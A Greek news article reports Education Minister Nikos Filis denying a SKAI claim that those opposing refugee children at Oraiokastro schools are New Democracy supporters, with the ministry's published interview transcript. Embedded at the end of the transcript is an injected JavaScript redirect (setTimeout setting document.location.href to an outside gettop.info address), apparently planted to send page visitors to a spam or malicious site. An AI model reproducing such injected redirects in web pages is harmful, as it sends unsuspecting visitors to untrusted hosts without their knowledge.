Ο Φίλης διαψεύδει: Δεν είπα ποτέ ότι όσοι δε θέλουν τα προσφυγόπουλα στο Ωραιόκαστρο είναι της ΝΔ

0
5

 

Διαψεύδει ο υπουργός Παιδείας Νίκος Φίλης την απόδοση δήλωσης περί υποκίνησης από τη Νέα Δημοκρατία, του Συλλόγου γονέων του δημοτικού σχολείου του Ωραιοκάστρου, για την απόφαση να μη δεχθεί προσφυγόπουλα στις τάξεις του.

Σε ανακοίνωση του υπουργείου, αναφέρεται ότι από «απροσεξία ή παρανόηση» ο τηλεοπτικός σταθμός ΣΚΑΙ εμφανίζει τον υπουργό Παιδείας, Νίκο Φίλη να έχει δηλώσει ότι: «Όσοι φωνάζουν για τα προσφυγόπουλα στο Ωραιόκαστρο ανήκουν στη ΝΔ.
Αυτή η φράση δεν ειπώθηκε ποτέ από τον υπουργό στη διάρκεια της συνέντευξής του στους δημοσιογράφους του ΣΚΑΙ κ.κ. Λυριτζή-Οικονόμου σήμερα το πρωί», επισημαίνεται.

Σύμφωνα με την ανακοίνωση, ο υπουργός Παιδείας κάλεσε όλα τα κόμματα και όλους τους φορείς να πάρουν θέση για τα γεγονότα στο Ωραιόκαστρο και «επισήμανε το πασίγνωστο γεγονός ότι ο δήμαρχος ανήκει στον ευρύτερο χώρο της ΝΔ. Αυτό δεν σημαίνει ότι ο υπουργός υποστηρίζει ότι είναι η ΝΔ που, επισήμως, ως συντεταγμένο κόμμα, υποκινεί τις τοπικές αντιδράσεις».

Μάλιστα, «για να αρθεί κάθε παρεξήγηση», το υπουργείο, με ανακοίνωσή του, δημοσίευσε το απομαγνητοφωνημένο απόσπασμα της συνέντευξης του κ. Φίλη και καλεί τη διεύθυνση του τηλεοπτικού σταθμού να αποκαταστήσει την αλήθεια.

Το συγκεκριμένο απόσπασμα έχει ως εξής:

Υπουργός Παιδείας: Επαναλαμβάνω κι έχει σημασία, όλα τα πολιτικά κόμματα- και δεν έχω ακούσει να μιλάνε, μου κάνει εντύπωση αυτή τη στιγμή- και όλοι οι φορείς θα πρέπει να τοποθετούνται και όχι να δείχνουν κατανόηση σε τέτοιου είδους τοπικές μειοψηφικές αντιδράσεις.

Δημοσιογράφος: Μου επιτρέπετε, την απόφαση την λαμβάνει η Πολιτεία δεν μπορεί ο καθένας από μας να κάνει ό,τι θέλει. Για το πώς διαμορφώνεται η εκπαιδευτική κατάσταση και για το πώς σπουδάζουν τα παιδιά μας αποφασίζεται από την Πολιτεία, ούτε οι γονείς, ούτε οι τοπικοί φορείς ούτε οι Σύλλογοι.

Υπουργός Παιδείας: Έχει όμως και σημασία, τα πολιτικά κόμματα που επί παντός επιστητού ανακοινώνουμε κάτι κάθε μέρα, να μιλήσουν και γι’ αυτό, και περιμένω τα μεγάλα πολιτικά κόμματα, όπως η ΝΔ να πάρει θέση, πολλώ δε μάλλον που ο Δήμαρχος που έχει δημιουργήσει και το πρόβλημα μαζί με μια ομάδα εκεί στο Ωραιόκαστρο, ανήκει και στον ευρύτερο χώρο της ΝΔ, σε μία τοποθέτηση σαφή. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here